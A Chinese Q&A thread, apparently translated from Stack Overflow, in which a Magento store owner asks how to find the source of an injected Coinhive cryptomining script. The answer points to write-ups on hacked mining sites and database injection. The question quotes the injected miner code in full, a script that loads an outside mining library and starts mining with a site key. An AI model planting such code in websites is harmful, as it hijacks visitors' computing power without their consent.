网站感染了硬币脚本

时间:2017-12-27 23:06:25

标签: javascript php magento

我的Magento Store感染了Coinhive script

我试图找到脚本的来源但找不到它。我还尝试了批量搜索和替换工具来查找源但失败了。

这是我网站html源代码中的代码:

<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
    var miner = new CoinHive.User('wMi7wDDFODxuLxV9S0M32EK0G9czsndP', 'sucurifirewall');
    miner.start();
</script>

请帮我解决这个问题。

1 个答案:

答案 0 :(得分:0)

本文提供了一些线索,说明使用搜索工具无法找到的代码可能来自以下位置: https://web.archive.org/web/20171228173759/https://blog.sucuri.net/2017/09/hacked-websites-mine-crypocurrencies.html

值得注意的是,显然这可能不仅是由插件引起的,也是由主题引起的。

magento堆栈交换的用户也将代码注入到他的数据库中,并描述了他用来摆脱它的步骤: https://web.archive.org/web/20171228173841/https://magento.stackexchange.com/questions/182920/website-start-redirecting-to-another-url

旁注: 引起我注意的另一件事是博客的名字 - &#39; sucuri&#39; - 也包含在代码中(&#39; sucurifirewall&#39;)。